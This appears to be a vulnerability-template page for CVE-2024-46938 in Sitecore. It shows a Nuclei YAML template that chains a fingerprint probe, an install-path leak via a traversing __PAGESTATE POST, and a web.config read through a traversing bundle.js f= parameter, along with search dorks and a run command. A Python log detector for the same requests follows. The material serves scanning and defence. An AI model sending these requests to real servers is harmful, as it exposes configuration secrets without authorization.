
Sitecore Experience Platform <= 10.4 - Arbitrary File Read

ID: CVE-2024-46938

Severity: high

Author: DhiyaneshDK

Tags: cve,cve2024,sitecore,lfi,rce

An issue was discovered in Sitecore Experience Platform (XP), Experience Manager (XM), and Experience Commerce (XC) 8.0 Initial Release through 10.4 Initial Release. An unauthenticated attacker can read arbitrary files.

```yaml
id: CVE-2024-46938

info:
  name: Sitecore Experience Platform <= 10.4 - Arbitrary File Read
  author: DhiyaneshDK
  severity: high
  description: |
    An issue was discovered in Sitecore Experience Platform (XP), Experience Manager (XM), and Experience Commerce (XC) 8.0 Initial Release through 10.4 Initial Release. An unauthenticated attacker can read arbitrary files.
  reference:
    - https://www.assetnote.io/resources/research/leveraging-an-order-of-operations-bug-to-achieve-rce-in-sitecore-8-x---10-x
    - https://nvd.nist.gov/vuln/detail/CVE-2024-46938
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2024-46938
    epss-score: 0.00087
    epss-percentile: 0.3838
    cpe: cpe:2.3:a:sitecore:experience_commerce:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 45
    vendor: sitecore
    product: experience_commerce
    shodan-query: http.title:"sitecore"
    fofa-query: title="sitecore"
    google-query: intitle:"sitecore"
  tags: cve,cve2024,sitecore,lfi,rce

flow: http(1) && http(2) && http(3)

http:
  # Request 1: fingerprint. A Sitecore instance redirects a missing media item to its notfound page.
  - method: GET
    path:
      - "{{BaseURL}}/-/media/doo-doo.ashx"

    host-redirects: true
    matchers:
      - type: word
        part: location
        words:
          - "/sitecore/service/notfound.aspx"
        internal: true

  # Request 2: the error message returned for a traversing __PAGESTATE value leaks the install path.
  - raw:
      - |
        POST /-/xaml/Sitecore.Shell.Applications.ContentEditor.Dialogs.EditHtml.ValidateXHtml?hdl=a HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        __PAGESTATE=/../../x/x

    matchers:
      - type: word
        part: body
        words:
          - "Could not find a part of the path"
        internal: true

    extractors:
      - type: regex
        name: file_path
        group: 1
        regex:
          - Could not find a part of the path '([^']+)\\x\\x\.txt
        internal: true

  # Request 3: read web.config through the bundle endpoint, trying the leaked path first and common install paths after it.
  - raw:
      - |
        GET /-/speak/v1/bundles/bundle.js?f={{paths}}sitecore\shell\client\..\..\..\web.config%23.js HTTP/1.1
        Host: {{Hostname}}

    payloads:
      paths:
        - '{{file_path}}\'
        - 'C:\inetpub\wwwroot\sitecore\'
        - 'C:\inetpub\wwwroot\sitecore1\'
        - 'C:\inetpub\wwwroot\sxa\'
        - 'C:\inetpub\wwwroot\XP0.sc\'
        - 'C:\inetpub\wwwroot\Sitecore82\'
        - 'C:\inetpub\wwwroot\Sitecore81\'
        - 'C:\inetpub\wwwroot\Sitecore81u2\'
        - 'C:\inetpub\wwwroot\Sitecore7\'
        - 'C:\inetpub\wwwroot\Sitecore8\'
        - 'C:\inetpub\wwwroot\Sitecore70\'
        - 'C:\inetpub\wwwroot\Sitecore71\'
        - 'C:\inetpub\wwwroot\Sitecore72\'
        - 'C:\inetpub\wwwroot\Sitecore75\'
        - 'C:\Websites\spe.dev.local\'
        - 'C:\inetpub\wwwroot\SitecoreInstance\'
        - 'C:\inetpub\wwwroot\SitecoreSPE_8\'
        - 'C:\inetpub\wwwroot\SitecoreSPE_91\'
        - 'C:\inetpub\wwwroot\Sitecore9\'
        - 'C:\inetpub\wwwroot\sitecore93sc.dev.local\'
        - 'C:\inetpub\wwwroot\Sitecore81u3\'
        - 'C:\inetpub\wwwroot\sitecore9.sc\'
        - 'C:\inetpub\wwwroot\sitecore901xp0.sc\'
        - 'C:\inetpub\wwwroot\sitecore9-website\'
        - 'C:\inetpub\wwwroot\sitecore93.sc\'
        - 'C:\inetpub\wwwroot\'
        - 'C:\inetpub\{{Hostname}}.sc\'
        - 'C:\inetpub\{{FQDN}}.sc\'
        - 'C:\inetpub\{{RDN}}.sc\'
        - 'C:\inetpub\{{FQDN}}\'
        - 'C:\inetpub\{{RDN}}\'
        - 'C:\inetpub\{{Hostname}}\'
        - 'C:\inetpub\{{Hostname}}.sitecore\'
        - 'C:\inetpub\{{FQDN}}.sitecore\'
        - 'C:\inetpub\{{RDN}}.sitecore\'
        - 'C:\inetpub\{{Hostname}}.website\'
        - 'C:\inetpub\{{FQDN}}.website\'
        - 'C:\inetpub\{{RDN}}.website\'
        - 'C:\inetpub\{{Hostname}}.dev.local\'
        - 'C:\inetpub\{{FQDN}}.dev.local\'
        - 'C:\inetpub\{{RDN}}.dev.local\'
        - 'C:\inetpub\{{Hostname}}sc.dev.local\'
        - 'C:\inetpub\{{FQDN}}sc.dev.local\'
        - 'C:\inetpub\{{RDN}}sc.dev.local\'
    stop-at-first-match: true

    matchers:
      - type: dsl
        dsl:
          - 'contains(body, "<configuration>")'
          - 'contains(content_type, "text/javascript")'
          - 'status_code == 200'
        condition: and
# digest: 490a004630440220696d8cc1604b9fa3c7a814839a1128a819aeb00f94f50ab5acf06a88f7ed6cb2022077849afa67ea13fe98529763d2e6fc5731d574f74a29bfba8f41c788cebecb2e:922c64590222798bb761d5b6d8e72950
```

This Nuclei template checks a target for CVE-2024-46938 by replaying the three-request flow above (Sitecore fingerprint, install-path leak, web.config read). Run it with the Nuclei tool:

```shell
$ nuclei -u "URL" -t "http/cves/2024/CVE-2024-46938.yaml"
```
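For the defending side, the same three requests the template sends are the indicators to hunt for in IIS access logs. The following is an added example, not part of the Nuclei template or of Sitecore: it classifies W3C extended log lines into the template's three stages and reports clients that completed the whole chain. The field layout (`date time cs-method cs-uri-stem cs-uri-query c-ip sc-status`) and the sample log lines are constructed for this example and must be adjusted to the `#Fields:` header of the actual log.

```python
"""Detect the request pattern of the CVE-2024-46938 template in IIS-style logs.

Added example (not the template's or Sitecore's code). Assumes the W3C extended
field order "date time cs-method cs-uri-stem cs-uri-query c-ip sc-status",
which is a constructed layout for this example.
"""
import re
from collections import defaultdict
from urllib.parse import unquote

# The three stages mirror the template's flow: a media probe that should
# redirect to notfound.aspx, a POST to ValidateXHtml (the error message leaks
# the install path) and a bundle.js fetch whose f= parameter traverses out of
# the bundle directory.
STAGE_PATTERNS = {
    "probe": re.compile(r"^/-/media/[^/]+\.ashx$", re.I),
    "path-leak": re.compile(r"^/-/xaml/.*ValidateXHtml$", re.I),
    "file-read": re.compile(r"^/-/speak/v1/bundles/bundle\.js$", re.I),
}
# "..\" or "../" after URL decoding; IIS logs keep the raw query so decode first.
TRAVERSAL = re.compile(r"\.\.[\\/]")

# Constructed sample log: one client walks the full chain, another makes
# ordinary requests to the same endpoints.
SAMPLE_LOG = r"""#Fields: date time cs-method cs-uri-stem cs-uri-query c-ip sc-status
2024-09-10 12:00:01 GET /-/media/doo-doo.ashx - 203.0.113.7 302
2024-09-10 12:00:02 POST /-/xaml/Sitecore.Shell.Applications.ContentEditor.Dialogs.EditHtml.ValidateXHtml hdl=a 203.0.113.7 500
2024-09-10 12:00:03 GET /-/speak/v1/bundles/bundle.js f=C:\inetpub\wwwroot\sitecore\shell\client\..\..\..\web.config%23.js 203.0.113.7 200
2024-09-10 12:05:00 GET /-/speak/v1/bundles/bundle.js f=sitecore/shell/client/Speak/Assets/js/main.js 198.51.100.4 200
2024-09-10 12:06:00 GET /-/media/brochure.ashx - 198.51.100.4 200
""".splitlines()


def parse_line(line):
    """Split one log line into a dict; returns None for directives and short lines."""
    if line.startswith("#"):
        return None
    parts = line.split()
    if len(parts) < 7:
        return None
    date, time_, method, stem, query, ip, status = parts[:7]
    return {"ts": f"{date} {time_}", "method": method.upper(), "stem": stem,
            "query": "" if query == "-" else query, "ip": ip, "status": status}


def classify(entry):
    """Return the template stage an entry matches, or None for benign traffic."""
    for stage, pattern in STAGE_PATTERNS.items():
        if pattern.match(entry["stem"]):
            break
    else:
        return None
    if stage == "probe":
        # The template keys on the redirect target; the access log only has the status.
        return "probe" if entry["status"].startswith("3") else None
    if stage == "path-leak":
        # Request bodies are not logged, so the POST to this endpoint is the only indicator.
        return "path-leak" if entry["method"] == "POST" else None
    # file-read: a decoded f= value that climbs out of the bundle directory is never legitimate.
    for pair in entry["query"].split("&"):
        key, _, value = pair.partition("=")
        if key.lower() == "f" and TRAVERSAL.search(unquote(value)):
            return "file-read"
    return None


def scan(lines):
    """Classify every line; returns a list of (client ip, stage, uri stem) findings."""
    findings = []
    for line in lines:
        entry = parse_line(line)
        if entry is None:
            continue
        stage = classify(entry)
        if stage:
            findings.append((entry["ip"], stage, entry["stem"]))
    return findings


def full_chain_clients(findings):
    """Clients seen at every stage of the template's flow (sorted)."""
    stages_by_ip = defaultdict(set)
    for ip, stage, _ in findings:
        stages_by_ip[ip].add(stage)
    return sorted(ip for ip, stages in stages_by_ip.items() if stages == set(STAGE_PATTERNS))


if __name__ == "__main__":
    hits = scan(SAMPLE_LOG)
    for ip, stage, stem in hits:
        print(f"{ip}\t{stage}\t{stem}")
    print("full chain:", full_chain_clients(hits))
```

The file-read stage on its own is the high-confidence signal, since a traversing `f=` value to `bundle.js` has no legitimate use; the probe and ValidateXHtml stages only raise confidence when the same client produces all three in sequence. Because IIS does not log POST bodies, the `__PAGESTATE` traversal itself is only visible in the application's error log, which is where "Could not find a part of the path" entries should be correlated with this output.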
